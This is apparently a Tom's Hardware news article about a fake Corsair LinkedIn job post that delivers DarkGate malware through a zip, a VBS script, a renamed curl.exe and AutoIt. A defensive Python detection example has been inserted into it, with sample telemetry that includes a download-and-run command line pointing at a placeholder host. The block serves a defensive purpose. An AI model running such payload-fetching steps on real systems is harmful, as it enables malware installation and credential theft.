Phony Corsair LinkedIn Listing Contains DarkGate Malware

(Image: Corsair. Image credit: Corsair)

You can never be too careful when surfing the web, even if you’re looking for a new job. Corsair is a prominent name in the gaming hardware and accessories market, and it stands to reason that it would be a hot destination for enthusiasts in the market for a new job. However, some nefarious parties are using Corsair’s name to spread DarkGate malware to unsuspecting job seekers’ computers.

Bleeping Computer first covered the report, which describes a Vietnamese cybercriminal ring using fake LinkedIn posts and direct messages to pitch a job opening at Corsair. The phony content claims that Corsair is hiring a Facebook Ads specialist and targets LinkedIn users based in the United States, United Kingdom, and India.

The LinkedIn posts and direct messages contain a link to a suspicious URL designed to look like a Corsair address, although it does not lead there. As if that URL weren’t suspicious enough, the link directs unsuspecting job applicants to a zip file (hosted on Dropbox or Google Drive) named “Salary and new products.8.2.1.zip.” The zip file contains the following files:

  • Job Description of Corsair.docx
  • Salary and new products.txt
  • PDF Salary and Products.pdf

According to WithSecure, the archive contains a VBS script that copies the Windows binary curl.exe to a different location and then renames it. The renamed file connects to an external site and downloads autoit3.exe and the autoit3 script. The executed script then deploys the DarkGate malware, which is designed to extract sensitive information from its targets. The malware then tries to uninstall any anti-malware software installed on the system, although WithSecure says that its software, along with Sophos and Forcepoint, thwarted those attempts.
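A defender-side illustration of the chain described above, added here and not taken from WithSecure's or Bleeping Computer's reports: a small detection routine run over constructed, Sysmon-style process-creation events (all paths and file names are invented) that flags a curl.exe copy running under another name, a download tool spawned by a Windows script host, and an AutoIt3 interpreter launched from a user-writable path with a script argument.

```python
# Added example (not from the article or the cited reports). Events are constructed
# to mirror the described stages: VBS copies/renames curl.exe, it fetches autoit3.exe
# and a script, and the interpreter runs from a temp folder.
from dataclasses import dataclass

@dataclass
class ProcEvent:
    image: str               # full path of the launched executable
    original_file_name: str  # OriginalFileName from the PE version resource
    command_line: str
    parent_image: str

# Constructed sample telemetry; nothing here is a real indicator.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\curl.exe", "curl.exe",
              "curl.exe -s https://example.invalid/ok", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Users\u\AppData\Local\Temp\upd.exe", "curl.exe",
              "upd.exe -o autoit3.exe https://example.invalid/autoit3.exe",
              r"C:\Windows\System32\wscript.exe"),
    ProcEvent(r"C:\Users\u\AppData\Local\Temp\autoit3.exe", "AutoIt3.exe",
              r"autoit3.exe C:\Users\u\AppData\Local\Temp\script.au3",
              r"C:\Users\u\AppData\Local\Temp\upd.exe"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect(events: list[ProcEvent]) -> list[tuple[str, str]]:
    """Return (rule, image) hits. Heuristic rules; tune them to your environment."""
    hits = []
    for ev in events:
        name, orig = basename(ev.image), ev.original_file_name.lower()
        # Rule 1: the binary is really curl.exe but runs under a different file name,
        # so image-name allowlists would miss the copy-and-rename step.
        if orig == "curl.exe" and name != "curl.exe":
            hits.append(("renamed_curl", ev.image))
        # Rule 2: a download tool spawned directly by a Windows script host.
        if orig == "curl.exe" and basename(ev.parent_image) in SCRIPT_HOSTS:
            hits.append(("scripthost_spawned_curl", ev.image))
        # Rule 3: AutoIt interpreter outside Program Files, fed an .au3 script.
        if orig == "autoit3.exe" and "\\program files" not in ev.image.lower() \
                and ".au3" in ev.command_line.lower():
            hits.append(("autoit_from_user_path", ev.image))
    return hits

if __name__ == "__main__":
    for rule, image in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {image}")
```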

DarkGate is related to the previously identified Ducktail malware, which steals credentials and cookies and relays them to the bad actors. However, DarkGate has a more specialized component that targets Facebook Business accounts. “If it locates a Facebook Business account session cookie, it will attempt to add the attacker to the account as an administrator,” write the security researchers at WithSecure. “[It] even has functionality to automatically create and publish fraudulent ad campaigns sent by the actor to the compromised device.”

We advise everyone to remain vigilant when dealing with unfamiliar or suspicious-looking posts and direct messages. And please, don’t go around haphazardly downloading and opening zip files, as you can’t always depend on your antivirus program to save your skin in every case.

Brandon Hill

Brandon Hill is a senior editor at Tom's Hardware. He has written about PC and Mac tech since the late 1990s with bylines at AnandTech, DailyTech, and Hot Hardware. When he is not consuming copious amounts of tech news, he can be found enjoying the NC mountains or the beach with his wife and two sons.

  • HaninTH
    "as you can’t always depend on your antivirus program to save your skin in every case."

    And this is why I do everything in purpose-built VMs and only in the particular VM related to the action I am taking. I never surf the web or do any other dubious action from a VM set up to pay my bills online. I even go so far as to physically separate the VMs for general-purpose internet activities onto different physical VM hosts, so as to hopefully ensure that any exploitation of the VM host doesn't get to anything sensitive. The networks are VLANed with separate virtual routers which do not know the others exist as well. A lot of work for a sense of security, but it lets me sleep easier than if I were doing all of it from one bare-metal OS/PC. I run all of this from repurposed/used, locally sourced HP/Dell servers. You could, of course, do it with lesser equipment using a variety of lightweight VM software; I prefer ESXi and Hyper-V in tandem, as I work with them daily as a profession.